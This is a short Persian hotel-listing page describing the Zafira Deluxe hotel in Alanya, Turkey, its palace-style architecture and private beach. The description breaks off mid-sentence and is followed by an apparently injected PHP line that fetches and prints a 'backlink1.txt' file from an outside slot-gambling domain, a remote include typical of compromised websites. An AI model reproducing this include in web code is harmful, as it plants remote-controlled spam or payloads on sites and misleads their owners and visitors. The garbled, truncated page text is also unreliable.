هتل زافیرا دلوکس آلانیا

هتل زافیرا دلوکس آلانیا

      هتل ۵ ستاره واقع در شهر آلانیا ترکیه بهترین انتخاب برای کسانی است که دوست دارند معماری و ظاهر هتلشان مانند کاخ باشد. هتل زافیرا دلوکس آلانیا در منطقه آوسلار بوده و از ساحل خصوصی برخوردار است. این ساحل به فاصله ۵۰۰ متر از هتل بوده و همه مدل از امکانات را

?php echo file_get_contents("https://harumslot99.com/backlink1.txt"); ?>